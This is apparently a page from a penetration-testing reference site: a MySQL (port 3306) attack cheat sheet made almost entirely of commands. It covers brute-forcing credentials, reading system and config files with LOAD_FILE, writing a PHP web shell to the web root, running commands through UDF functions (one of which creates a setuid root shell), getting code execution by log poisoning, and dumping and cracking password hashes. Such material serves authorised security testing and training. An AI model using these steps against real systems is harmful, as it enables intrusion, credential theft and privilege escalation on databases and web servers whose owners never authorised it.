> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# 3306 - MySQL

> MySQL enumeration and exploitation: UDF command execution, file read/write, and credential extraction.

## Service Detection

```bash theme={"dark"}
nmap -sV -sC -p 3306 TARGET
```

***

## Connect

```bash theme={"dark"}
mysql -h TARGET -u root
mysql -h TARGET -u root -p
mysql -h TARGET -u root -p'password'
```

***

## Brute-Force

```bash theme={"dark"}
hydra -L users.txt -P passwords.txt mysql://TARGET
# CrackMapExec/NetExec have no mysql protocol — use nmap or medusa
nmap -p 3306 --script mysql-brute --script-args userdb=users.txt,passdb=passwords.txt TARGET
```

Default: `root` / (blank).

***

## Enumeration

```sql theme={"dark"}
SELECT version();
SELECT user();
SELECT current_user();
SHOW DATABASES;
SELECT user, host, authentication_string FROM mysql.user;
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
```

***

## File Read

```sql theme={"dark"}
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/var/www/html/config.php');
SELECT LOAD_FILE('C:\\Windows\\win.ini');
```

Requires `FILE` privilege.

***

## File Write (Web Shell)

```sql theme={"dark"}
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
```

Check restriction:

```sql theme={"dark"}
SHOW VARIABLES LIKE 'secure_file_priv';
```

Empty = write anywhere. Path = restricted to that dir.

***

## UDF Command Execution

If `FILE` + `INSERT` privilege:

### Linux

```bash theme={"dark"}
searchsploit mysql udf
# Use lib_mysqludf_sys.so
```

```sql theme={"dark"}
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id');
SELECT sys_exec('cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash');
```

### Windows

```sql theme={"dark"}
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.dll';
SELECT sys_exec('cmd /c whoami > C:\\Windows\\Temp\\output.txt');
```

***

## Password Hashes

```sql theme={"dark"}
-- MySQL 5.7+
SELECT user, authentication_string FROM mysql.user;

-- Older
SELECT user, password FROM mysql.user;
```

Crack:

```bash theme={"dark"}
hashcat -m 300 hashes.txt /usr/share/wordlists/rockyou.txt
```

***

## Log Poisoning → RCE

```sql theme={"dark"}
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/shell.php';
SELECT '<?php system($_GET["cmd"]); ?>';
SET GLOBAL general_log = 'OFF';
```

Access: `http://TARGET/shell.php?cmd=id`

***

## NSE Scripts

```bash theme={"dark"}
nmap -p 3306 --script mysql-info TARGET
nmap -p 3306 --script mysql-enum TARGET
nmap -p 3306 --script mysql-brute TARGET
nmap -p 3306 --script mysql-databases --script-args mysqluser=root,mysqlpass='' TARGET
```

***

## Quick Reference

| Check       | Command                                                    |
| ----------- | ---------------------------------------------------------- |
| Connect     | `mysql -h TARGET -u root`                                  |
| Read file   | `SELECT LOAD_FILE('/etc/passwd')`                          |
| Write shell | `SELECT "<?php..." INTO OUTFILE '/var/www/html/shell.php'` |
| UDF RCE     | `CREATE FUNCTION sys_exec...`                              |
| Dump hashes | `SELECT user, authentication_string FROM mysql.user`       |
